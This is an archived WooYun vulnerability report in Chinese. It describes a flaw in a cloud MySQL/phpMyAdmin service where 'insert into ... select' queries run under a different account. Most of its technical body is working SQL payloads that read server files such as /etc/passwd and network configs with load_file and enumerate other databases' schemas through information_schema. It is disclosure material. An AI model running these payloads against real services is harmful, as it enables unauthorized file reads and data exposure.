乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-03-26: 细节已通知厂商并且等待厂商处理中 2013-03-26: 厂商已经确认,细节仅向厂商公开 2013-04-05: 细节向核心白帽子及相关领域专家公开 2013-04-15: 细节向普通白帽子公开 2013-04-25: 细节向实习白帽子公开 2013-05-10: 细节向公众公开
通过一定方式可读取数据库相关内容,查看服务器文件等。
MySQL(云数据库) phpMyAdmin管理时,insert into 表 select load_file('/etc/passwd')等可读取本地文件内容,也可查询information_schema库内容。目测是读和写操作使用了不同的数据库账号。
/* 以下结果是不同的 */select user();insert into tmp(data) select user();
/* 一些可执行的操作 *///文件读取insert into test(data) select load_file('/etc/passwd');insert into test(data) select load_file('/etc/issue');insert into test(data) select load_file('/etc/sysconfig/network-scripts/ifcfg-eth0');//数据结构读取insert into test(data) select load_file('/etc/sysconfig/network-scripts/ifcfg-eth1');insert into test(data) select SCHEMA_NAME from information_schema.SCHEMATA limit 10;insert into test(data) select concat('databases:',COUNT(*)) from information_schema.SCHEMATA;insert into test(data) select concat('ibase_bae_code tables:',group_concat(TABLE_NAME)) from information_schema.TABLES where TABLE_SCHEMA='ibase_bae_code';insert into test(data) select concat('ibase_bae_code.apps columns:',group_concat(COLUMN_NAME)) from information_schema.COLUMNS where TABLE_SCHEMA='ibase_bae_code' AND TABLE_NAME='apps';insert into test(data) select concat('ibase_bae_code tables:',group_concat(TABLE_NAME)) from information_schema.TABLES where TABLE_SCHEMA='ibase_bae_code';insert into test(data) select concat('ns_bae_yun_pma tables:',group_concat(TABLE_NAME)) from information_schema.TABLES where TABLE_SCHEMA='ns_bae_yun_pma';insert into test(data) select concat('ns_bae_yun_pma.pma_session columns:',group_concat(COLUMN_NAME)) from information_schema.COLUMNS where TABLE_SCHEMA='ns_bae_yun_pma' AND TABLE_NAME='pma_session';
控制文件和数据库操作权限,修复时注意通过平台上的数据导入也是可以执行的。
危害等级:高
漏洞Rank:15
确认时间:2013-03-26 16:20
感谢提交,处理中...
暂无
